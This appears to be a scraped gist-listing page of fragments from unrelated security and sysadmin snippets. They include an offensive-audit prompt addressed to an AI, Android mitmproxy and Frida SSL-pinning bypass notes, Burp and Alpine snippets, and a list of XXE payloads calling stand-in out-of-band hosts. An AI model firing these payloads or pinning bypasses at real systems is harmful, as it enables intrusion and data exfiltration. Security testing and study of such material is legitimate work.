🇸🇨🇭🇳🇮🇬🇬🇮🇪 schniggie

You are an expert software engineer and offensive security practitioner conducting a security audit of this codebase. Your goal is to find realistic, high-impact bugs and prove them against a running instance of the service.

Scope of interest (critical / high severity only)

Remote code execution
User impersonation / takeover
Authentication / authorization bypass
Detection / filter / trait bypass (if the service is a detection system)
Path traversal, SSRF, deserialization flaws, injection (SQL/command/log/header)
SQL injection, command injection, XSS injection and so on.

Boot Image Extraction Guide

Guide on how to extract a boot image from any Android phone without needing to root using Magisk, without stock firmware or a custom recovery.

Docker on Android 🐋📱

Edit 🎉

All packages, except for Tini have been added to termux-root. To install them, simply pkg install root-repo && pkg install docker. This will install the whole docker suite, left only Tini to be compiled manually.

Summary

Most of the time, applications won't pin the certificate. Running mitmproxy and passing all Android traffic through it is as simple as adb connect <IP> && adb shell settings put global http_proxy <mitmproxy host>:<mitmproxy port> (or use Android's UI)

Some applications, however, pin the certificate and will refuse to do any network calls if using mitmproxy.

Luckily, Frida is here!

This assumes Android x86 is running in a VM, that you are a developer in Android (tap the build version enough times), adb debugging is enabled, and that android tools are installed on the host.

start mitmproxy on host
visit mitm.it on the target (after setting the proxy) and install the spoofed cert

XCP-ng USB passthrough tools

A set of command line tools and a service to make setting up passthrough USB devices easier:

add-custom-usb-policies - script to store and apply custom USB policies required for specific devices
attach-usb-devices - script and service to automatically connect USB devices to VMS when XCP-ng boots up
plug-usb - attach a physical USB device to a VM in one command
unplug-usb - remove a physical USB device from a VM in one command

To set up, copy the files onto your server and run install.sh to copy everything and set up the service.

	console.log("[*] SSL Pinning Bypasses");
	console.log(`[*] Your frida version: ${Frida.version}`);
	console.log(`[*] Your script runtime: ${Script.runtime}`);

	/**
	* by incogbyte
	* Common functions
	* thx apkunpacker, NVISOsecurity, TheDauntless
	* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
	* !!! THIS SCRIPT IS NOT A SILVER BULLET !!

	'''
	Based on the initial work of Digininja at https://github.com/digininja/CeWL. While CeWL is a script written
	in Ruby that requires an independent crawl of a website in order to build a custom wordlist, Whey CeWLer
	runs within Portswigger's Burp Suite and parses an already crawled sitemap to build a custom wordlist. It
	does not have the meta data parsing capabilities that CeWL does, but it more than makes up for it in
	convenience.

	The name gets its origins from the CeWLer portion of the CO2 Burp extension by Jason Gillam, which is written
	in Java and does something similar, but Whey CeWLer is a completely reimagined extension written in Python,
	making it "way cooler".

	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y

	KEYMAPOPTS="us us"
	HOSTNAMEOPTS="-n alpine"
	INTERFACESOPTS="auto lo
	iface lo inet loopback

	auto eth0
	iface eth0 inet dhcp
	hostname alpine
	"
	TIMEZONEOPTS="-z UTC"

	#!/usr/bin/env python3

	# NOTE: this script is deprecated;
	# maintained version with SVG icons: https://github.com/glowinthedark/index-html-generator/

	# ---
	# Copyright 2020 glowinthedark
	#
	# Licensed under the Apache License, Version 2.0 (the "License");
	# you may not use this file except in compliance with the License.

​🇸​​🇨​​🇭​​🇳​​🇮​​🇬​​🇬​​🇮​​🇪​ schniggie